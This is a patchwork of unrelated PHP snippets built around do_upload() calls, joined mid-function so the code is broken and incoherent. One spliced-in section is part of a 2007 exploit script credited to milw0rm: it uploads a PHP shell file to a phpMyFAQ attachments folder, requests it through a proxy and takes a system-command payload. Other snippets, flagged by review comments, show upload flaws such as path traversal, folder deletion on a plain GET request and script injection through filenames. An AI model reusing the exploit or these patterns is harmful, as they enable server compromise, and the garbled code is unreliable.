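/**
 * Upload page controller.
 *
 * Requires a logged-in user. On a POST carrying the 'upload' button, validates
 * the 'file' upload and hands it to do_upload(); otherwise, or when validation
 * fails, renders the upload form with the collected errors. Everything read
 * from $_POST and $_FILES is untrusted input.
 *
 * @return mixed Whatever must_log_in() returns for anonymous visitors; null otherwise.
 */
function content()
{
    if (!user_logged_in()) {
        return must_log_in();
    }
    $errors = array();
    if (array_key_exists('upload', $_POST)) {
        $upload = array_key_exists('file', $_FILES) ? $_FILES['file'] : null;
        // Check the upload status before touching tmp_name: on UPLOAD_ERR_NO_FILE
        // tmp_name is '' and filesize() would only emit a warning.
        // is_uploaded_file() refuses paths that were not uploaded by this request.
        if ($upload === null
            || (isset($upload['error']) && $upload['error'] !== UPLOAD_ERR_OK)
            || !is_uploaded_file($upload['tmp_name'])
            || filesize($upload['tmp_name']) == 0) {
            $errors[] = 'Please supply a file';
        }
        if (count($errors) == 0) {
            // The extension comes from the client-supplied name, so it says nothing
            // reliable about the content. Default to '' when the name has no
            // extension instead of reading an undefined $matches[1].
            $extension = '';
            if (preg_match('/\\.([^\\/.]+)$/', $upload['name'], $matches)) {
                $extension = $matches[1];
            }
            // 'type' is also whatever the browser declared; do_upload() must validate it.
            $file_id = do_upload($upload['tmp_name'], $upload['type'], $extension, $upload['size']);
            page_header('File uploaded');
            ?>


      <?php 
            return;
        }
    }
    page_header('Upload file');
    show_error_list($errors);
    ?>

    <form enctype="multipart/form-data" action="" method="post">
      <div class="fieldrow">
        <div>
          <label for="file">Select an image 
            <span class="label-extra">(size limit: 8MB)</span></label>
          <input id="file" name="file" type="file" />
        </div>
      </div>

  
      <div class="fieldrow">
        <input type="submit" name="upload" value="Upload" />
      </div>
    </form>

<?php 
}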
// Loads the ticket row together with its category, status and priority names
// and the owning group. The %d placeholder is filled by squery() from $id
// (squery() is a project helper — presumably it casts/escapes its arguments; verify).
$query = squery("SELECT t.id,t.randcode,t.status,t.title,t.description,t.unick,t.ufullname,t.uemail,t.uphone,t.uip,t.rep_u,\nt.rep_g,t.open_time,t.opened_by,t.is_real,t.is_private,t.email_upd,t.memo_upd,c1.name AS cat1_name,c2.name AS cat2_name,c3.name AS \ncat3_name,s.status_name,up.priority_name AS upriority,sp.priority_name AS priority,c3.extra,t.ext1,t.ext2,t.ext3,t.merged_to,t.cc,\ng.private_actions,t.lastupd_time \nFROM (karnaf_tickets AS t INNER JOIN karnaf_cat3 AS c3 ON c3.id=t.cat3_id INNER JOIN karnaf_cat2 AS c2 ON c2.id=c3.parent \nINNER JOIN karnaf_cat1 AS c1 ON c1.id=c2.parent INNER JOIN karnaf_statuses AS s ON s.status_id=t.status INNER JOIN karnaf_priorities AS up ON \nup.priority_id=t.upriority INNER JOIN karnaf_priorities AS sp ON sp.priority_id=t.priority LEFT JOIN groups AS g ON g.name=t.rep_g) WHERE t.id=%d", $id);
if ($result = sql_fetch_array($query)) {
    if (!$isoper && $randcode != $result['randcode'] && ($nick != $result['unick'] || $nick == "Guest" || $a_regtime > (int) $result['open_time'])) {
        AccessDenied("You must provide the ticket verification code to view this page.");
    }
    if (isset($_POST['reply_text']) && !empty($_POST['reply_text']) && $result['status'] != 0) {
        squery("INSERT INTO karnaf_replies(tid,reply,r_by,r_time,r_from,ip) VALUES(%d,'%s','%s',%d,'%s','%s')", $id, $_POST['reply_text'], $nick, time(), $nick, get_session_ip());
        if ((int) $result['status'] == 2) {
            squery("UPDATE karnaf_tickets SET status=1,lastupd_time=%d WHERE id=%d AND status=2", time(), $id);
            send_memo($result['rep_u'], "User has replied to ticket #" . $result['id'] . ". For more information visit: " . KARNAF_URL . "/edit.php?id=" . $result['id']);
        }
        echo "<div class=\"status\">Your reply has been saved.</div><br>";
        $result['status'] = 1;
    }
    if (isset($_FILES['attachment-file']['name']) && !empty($_FILES['attachment-file']['name'])) {
        $error = do_upload($id);
        if ($error == "") {
            if ((int) $result['status'] == 2) {
                squery("UPDATE karnaf_tickets SET status=1,lastupd_time=%d WHERE id=%d AND status=2", time(), $id);
                send_memo($result['rep_u'], "User has added an attachment to ticket #" . $result['id'] . ". For more information visit: " . KARNAF_URL . "/edit.php?id=" . $result['id']);
            }
            echo "<div class=\"status\">Your attachment has been saved.</div><br>";
        } else {
            echo "<div class=\"status_err\">Error: " . $error . "</div><br>";
        }
    }
    if ($isoper) {
        if (IsGroupMember($result['rep_g']) || IsKarnafAdminSession()) {
            $isadmin = 1;
        }
        if ($result['is_private'] && !$isadmin) {
} else {
    // NOTE(review): only the truthiness of $_FILES['Filedata'] is tested; the
    // per-file error code in $_FILES['Filedata']['error'] is never consulted.
    if ($_FILES['Filedata']) {
        // Audit line: the client-supplied file name and MIME type are appended to
        // log.txt verbatim, so the log records what the browser claimed, not what
        // was received, and embedded newlines are not stripped.
        $resource = fopen("log.txt", "a");
        fwrite($resource, date("Ymd h:i:s") . "UPLOAD - {$_SERVER['REMOTE_ADDR']}" . $_FILES['Filedata']['name'] . " " . $_FILES['Filedata']['type'] . "\n");
        fclose($resource);
        // Both values come straight from the request; the MIME type is not derived
        // from the file content.
        $file_type = $_FILES['Filedata']['type'];
        $file_name = $_FILES['Filedata']['name'];
        // When the name contains no '.', strrpos() returns false, substr() starts
        // at offset 0 and the whole lowercased name ends up in $file_ext.
        $file_ext = strtolower(substr($file_name, strrpos($file_name, ".")));
        //File Size Check
        if ($_FILES['Filedata']['size'] > $MAX_SIZE) {
            $message = "The file size is over 2MB.";
        } else {
            // NOTE(review): with && the upload is rejected only when BOTH the MIME
            // type and the extension miss their allow-lists, so a type listed in
            // $FILE_MIMES admits any extension (and vice versa). Requiring both
            // checks to pass would be || here — confirm intent. in_array() is also
            // called without strict comparison.
            if (!in_array($file_type, $FILE_MIMES) && !in_array($file_ext, $FILE_EXTS)) {
                $message = "Sorry, {$file_name}({$file_type}) is not allowed to be uploaded.";
            } else {
                $message = do_upload($upload_dir, $upload_url);
            }
        }
        // $message (which may contain the client-supplied file name) and $url_this
        // are interpolated into a JavaScript string literal without escaping or
        // URL-encoding.
        print "<script>window.location.href='{$url_this}?message={$message}'</script>";
    } else {
        // This else runs only when !$_FILES['Filedata'] holds, so the inner else
        // below is unreachable and "Invalid File Specified." is never assigned.
        if (!$_FILES['Filedata']) {
        } else {
            $message = "Invalid File Specified.";
        }
    }
}
/************************************************************
 *     List Files
 ************************************************************/
// opendir() returns false when $upload_dir cannot be opened; that case is not
// handled here.
$handle = opendir($upload_dir);
// Listing buffer, initially empty.
$filelist = "";
// NOTE(review): a plain GET request carrying delFolder and dir deletes a
// folder; no CSRF token or permission check is visible at this point, and the
// folder name reaches delete_folder() unvalidated.
if (isset($_GET['delFolder']) && isset($_GET['dir'])) {
    delete_folder($_GET['delFolder']);
}
// Upload handler. dirPath is taken from the request and used both to adjust
// $FILE_ROOT and, further down, as part of the destination directory.
if (isset($_FILES['upload']) && is_array($_FILES['upload']) && isset($_POST['dirPath'])) {
    $dirPathPost = $_POST['dirPath'];
    if (strlen($dirPathPost) > 0) {
        // A leading '/' appends to $FILE_ROOT; anything else replaces it outright.
        if (substr($dirPathPost, 0, 1) == '/') {
            $FILE_ROOT .= $dirPathPost;
        } else {
            $FILE_ROOT = $dirPathPost;
        }
    }
    // Ensure a trailing '/'. strrpos() yields false when there is no '/' at all,
    // and false != 0 is false, so a one-character root with no slash is left as is.
    if (strrpos($FILE_ROOT, '/') != strlen($FILE_ROOT) - 1) {
        $FILE_ROOT .= '/';
    }
    // NOTE(review): the destination is $BASE_DIR . $BASE_ROOT . $dirPathPost, not
    // the $FILE_ROOT just computed, and $dirPathPost is not checked for '..'
    // segments before being joined into the path — confirm which root was meant.
    do_upload($_FILES['upload'], $BASE_DIR . $BASE_ROOT . $dirPathPost . '/');
}
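/**
 * Move one uploaded file into $dest_dir and flag that the upload list should be cleared.
 *
 * @param array  $file     One entry of $_FILES; 'tmp_name' and 'name' are read.
 * @param string $dest_dir Destination directory, expected to end with '/'.
 * @return void
 */
function do_upload($file, $dest_dir)
{
    global $clearUploads;
    if (is_file($file['tmp_name'])) {
        // basename() strips any directory components from the client-supplied
        // name, so the file can only land directly inside $dest_dir. The name's
        // extension and the file content are still not validated here.
        $target = $dest_dir . basename($file['name']);
        // move_uploaded_file() itself refuses sources that are not PHP uploads.
        move_uploaded_file($file['tmp_name'], $target);
    }
    $clearUploads = true;
}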
function delete_folder($folder)
{
    global $BASE_DIR, $refresh_dirs;
    //var_dump($BASE_DIR);
    $del_folder = dir_name($BASE_DIR) . $folder;
    echo "=> Uploading file.\n";
    $result = curl_exec($ch);
    curl_close($ch);
    @unlink("kebab.php");
    $get = $baseurl . "/attachments/1337/kebab.php\n";
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $get);
    curl_setopt($ch, CURLOPT_PROXY, $proxy);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $result = curl_exec($ch);
    if (strstr($result, "Un1q")) {
        echo substr($result, 4);
    } else {
        echo "Not vulnerable / error ?\n";
    }
    curl_close($ch);
}
// Two positional arguments are required; otherwise print the usage line and stop.
if ($argc < 3) {
    printf("Usage: %s http://test.com/phpmyfaq/ \"<? system('uname -a'); ?> \" [proxy]\n", $argv[0]);
    exit(0);
}
// The optional third positional argument is passed on as the proxy; empty means none.
if ($argc == 4) {
    $proxy = $argv[3];
} else {
    $proxy = "";
}
do_upload($argv[1], $proxy, $argv[2]);
?>

# milw0rm.com [2007-03-01]
        }
    }
    // action defaults to 'showdir'
    if (is_null($action)) {
        $action = 'showdir';
    }
}
switch ($action) {
    case 'showdir':
        do_showdir();
        break;
    case 'showupload':
        do_showupload();
        break;
    case 'upload':
        do_upload();
        break;
    case 'showmkdir':
        do_showmkdir();
        break;
    case 'mkdir':
        do_mkdir();
        break;
    case 'showrename':
        do_showrename();
        break;
    case 'rename':
        do_rename();
        break;
    case 'showmove':
        do_showmove();
 // No album cover requested: render the "upload complete" page and stop here.
 if ($upload_album_cover == 'no') {
     $show_audio_done = 1;
     $show_image_done = 0;
     $album_image_message = $config['album_image_message'];
     $template = "themes/{$user_theme}/templates/main_1.htm";
     $inner_template1 = "themes/{$user_theme}/templates/inner_upload_audio_complete.htm";
     $TBS = new clsTinyButStrong();
     $TBS->NoErr = true;
     $TBS->LoadTemplate("{$template}");
     $TBS->Render = TBS_OUTPUT;
     $TBS->Show();
     // NOTE(review): @ hides any error from mysql_close(); the mysql_* extension
     // no longer exists in PHP 7 and later.
     @mysql_close();
     die;
 } else {
     // NOTE(review): only the truthiness of $_FILES['userfile'] is checked, not
     // its error code. When no file is present, $album_image_message,
     // $album_new_pic and $upload_proceed keep whatever value they had before.
     if ($_FILES['userfile']) {
         // assumes do_upload() returns [message, new picture name, proceed flag] — TODO confirm
         $album_cover_change = do_upload($upload_dir);
         $album_image_message = $album_cover_change[0];
         $album_new_pic = $album_cover_change[1];
         $upload_proceed = $album_cover_change[2];
     }
 }
 if ($upload_proceed == true) {
     // update audio_albums table album cover image
     $sql_image = "UPDATE audio_albums SET album_picture = '{$album_new_pic}' WHERE album_id = '{$album_id}'";
     $query_image = @mysql_query($sql_image);
     $show_image_done = 1;
     $album_image_message = $config['album_image_message'];
     $template = "themes/{$user_theme}/templates/main_1.htm";
     $inner_template1 = "themes/{$user_theme}/templates/inner_upload_audio_complete.htm";
     $TBS = new clsTinyButStrong();
     $TBS->NoErr = true;
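/**
 * Handle a media upload posted to this page.
 *
 * Reads the file from $_FILES['upload'] and the target folder from
 * $_POST['dirPath'], then hands both to do_upload(). Does nothing when either
 * is missing or when dirPath would step outside images/stories/.
 *
 * @return void
 */
function upload()
{
    global $mosConfig_absolute_path;
    if (!isset($_FILES['upload']) || !is_array($_FILES['upload']) || !isset($_POST['dirPath'])) {
        return;
    }
    $dirPathPost = $_POST['dirPath'];
    // dirPath is client-controlled and is concatenated into a filesystem path,
    // so refuse parent-directory segments (either separator) and NUL bytes
    // rather than let the destination escape images/stories/.
    $segments = explode('/', str_replace('\\', '/', $dirPathPost));
    if (in_array('..', $segments, true) || strpos($dirPathPost, "\0") !== false) {
        return;
    }
    do_upload($_FILES['upload'], $mosConfig_absolute_path . '/images/stories/' . $dirPathPost . '/');
}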
        $name = trim($name, ": ");
        if (in_array($name, $grab)) {
            $auth[$name] = trim($parts[1]);
        }
    }
    return $auth;
}
$auth = do_auth();
// NOTE(review): this dumps the parsed authentication header values in full to
// stdout; anything that captures the output (terminal scrollback, CI logs)
// will hold them.
printf(" \n **** parsed auth headers for PUT **** \n");
print_r($auth);
$ch2 = curl_init();
// get all files in css dir
$files = array();
// load everything from local css folder into
// <storage-url>/asset/css/local-file-path
// RecursiveDirectoryIterator is created without SKIP_DOTS, so '.' and '..'
// entries are yielded and filtered out by name below.
foreach (new RecursiveIteratorIterator(new RecursiveDirectoryIterator('css')) as $path) {
    $filename = sprintf("%s", $path);
    $pos = strrpos($filename, "/");
    // Paths without a '/' are skipped silently (no else branch).
    if ($pos !== false) {
        $last = substr($filename, $pos + 1);
        if ($last == '.' || $last == '..') {
            printf(" ignore file :: %s \n", $filename);
        } else {
            array_push($files, $filename);
        }
    }
}
// One do_upload() call per file, all sharing the same curl handle and auth headers.
foreach ($files as $file) {
    do_upload($ch2, $auth, $file);
}
curl_close($ch2);
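/**
 * Handle a media upload posted to this page.
 *
 * Runs the spoof check, then reads the file from $_FILES['upload'] and the
 * target folder from $_POST['dirPath'] and hands both to do_upload(). Does
 * nothing when either is missing or when dirPath would step outside
 * COM_MEDIA_BASE.
 *
 * @return void
 */
function upload()
{
    josSpoofCheck();
    if (!isset($_FILES['upload']) || !is_array($_FILES['upload']) || !isset($_POST['dirPath'])) {
        return;
    }
    $dirPathPost = $_POST['dirPath'];
    $file = $_FILES['upload'];
    // dirPath is client-controlled and is concatenated into a filesystem path,
    // so refuse parent-directory segments (either separator) and NUL bytes
    // rather than let the destination escape COM_MEDIA_BASE.
    $segments = explode('/', str_replace('\\', '/', $dirPathPost));
    if (in_array('..', $segments, true) || strpos($dirPathPost, "\0") !== false) {
        return;
    }
    do_upload($file, COM_MEDIA_BASE . $dirPathPost . '/');
}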
 /**
  * Builds the product row from the current POST request.
  *
  * @param array $user Current user row; only $user['id'] is read.
  * @return array Column => value map for the product insert.
  */
 private function get_info_product($user)
 {
     // NOTE(review): the value returned by do_upload() is stored in $image but
     // never used; the 'image' column below gets a random number instead.
     $image = do_upload();
     // 'image' => rand(1, 50) . '' — presumably meant to be the uploaded image; confirm with the caller.
     $product_info = array('name' => $this->input->post('name'), 'area_id' => $this->input->post('area'), 'category_id' => $this->input->post('category'), 'feild_id' => $this->input->post('feild'), 'created_date' => date('Y-m-d', time()), 'end_date' => $this->input->post('enddate'), 'content' => $this->input->post('content'), 'user_id' => $user['id'], 'image' => rand(1, 50) . '', 'active' => 0);
     return $product_info;
 }
/**
 * Ask the remote API for the session and server limits, then start the upload.
 *
 * Runs the curl binary via exec(), parses the XML reply with xml2array() and,
 * unless the reply carries an error, calls do_upload() with the session id,
 * server URL and size limit it returned. The file to send is the global
 * $filepath. print_log() calls with a trailing true are treated as fatal by
 * the rest of the flow.
 *
 * @return void
 */
function get_auth()
{
    global $filepath;

    // The command line is assembled by string concatenation from configuration
    // constants; none of the values passes through escapeshellarg().
    if (USERNAME == 'free' && PASSWORD == 'free') {
        $command = CURL_BIN . ' -A ' . CURL_USERAGENTS . ' -s -F "op=api_get_limits" ' . CURL_STARTURL;
    } else {
        $command = CURL_BIN . ' -A ' . CURL_USERAGENTS . ' -s -F "op=api_get_limits" -F "login='******'" -F "password='******'" ' . CURL_STARTURL;
    }
    exec($command, $out);
    $reply = xml2array(implode("\n", $out));

    if (!array_key_exists('Data', $reply)) {
        print_log('Cannot retrieve XML data. Exit.', 'get_auth', 0, true);
    }
    if (empty($reply['Data']['ServerURL']) || empty($reply['Data']['MaxUploadFilesize'])) {
        print_log('Important XML value is empty.', 'get_auth', 0, false);
        print_log('Uploading aborted. Exit.', 'get_auth', 0, true);
    }

    $xml_error = $reply['Data']['Error'];
    $xml_sessid = $reply['Data']['SessionID'];
    $xml_server = $reply['Data']['ServerURL'];
    $xml_maxsize = $reply['Data']['MaxUploadFilesize'];

    $rule = '---------------------------------------------------------------------------';
    print_log($rule, 'get_auth', 1, false);
    print_log('ServerURL : ' . $xml_server, 'get_auth', 1, false);
    // NOTE(review): the session id is written to the log in clear here.
    print_log('SessionID : ' . $xml_sessid, 'get_auth', 1, false);
    print_log('MaxSize   : ' . $xml_maxsize . ' MB', 'get_auth', 1, false);
    print_log($rule, 'get_auth', 1, false);

    // Any error code stops the upload; only auth_error gets a dedicated message.
    if (!empty($xml_error)) {
        if ($xml_error == 'auth_error') {
            print_log('Username/password invalid. Exit.', 'get_auth', 0, true);
        }
        return;
    }

    // An empty session id means the free account path; the registered path
    // passes an extra false to do_upload().
    if (empty($xml_sessid)) {
        print_log('Uploading with free user account.', 'get_auth', 1, false);
        do_upload($filepath, $xml_sessid, $xml_server, $xml_maxsize);
        return;
    }
    print_log('Uploading with registered user account.', 'get_auth', 1, false);
    do_upload($filepath, $xml_sessid, $xml_server, $xml_maxsize, false);
}
     exec("{$xgettext_executable} `find -name \"*.php\" -o -name \"*.inc\"` -p {$dyn_locales_dir}/ -o messages.pot --keyword=_ -L PHP --add-comments=TRANSLATORS 2>&1", $exec_out, $ret_var);
     if ($ret_var) {
         echo "<center>" . _("Strings <b>not</b> rebuilt!") . "</center><br>" . _("This is the <code>xgettext</code> output:") . "<br><br>";
         echo "<pre>";
         foreach ($exec_out as $v) {
             echo html_safe($v) . "\n";
         }
         echo "</pre><br>";
     } else {
         echo "<p>" . _("<code>xgettext</code> ran successfully.") . "</p>";
     }
     echo "<p><a href='{$translate_url}'>" . _("Back to the Translation Center") . "</a></p>";
 } else {
     // Dispatch on $func. Every branch passes the requested locale through
     // validate_locale() before it is used. $_REQUEST also accepts the value
     // from GET and cookies, not just POST.
     if ($func == "upload") {
         $locale = validate_locale($_REQUEST['locale']);
         do_upload($locale);
         // $locale is interpolated into the href unescaped; this relies on
         // validate_locale() returning something safe for an HTML attribute — confirm.
         echo "<p><a href='{$translate_url}?func=manage&amp;locale={$locale}'>" . sprintf(_("Back to manage locale %s"), $locale) . "</a></p>";
     } else {
         if ($func == "merge") {
             $locale = validate_locale($_REQUEST['locale']);
             // @ silences the undefined-index notice when 'fuzzy' is absent; $fuzzy is then null.
             $fuzzy = @$_REQUEST['fuzzy'];
             do_merge($locale, $fuzzy);
             echo "<p><a href='{$translate_url}?func=manage&amp;locale={$locale}'>" . sprintf(_("Back to manage locale %s"), $locale) . "</a></p>";
         } else {
             if ($func == "manage") {
                 $locale = validate_locale($_REQUEST['locale']);
                 manage_form($locale);
             }
         }
     }
 }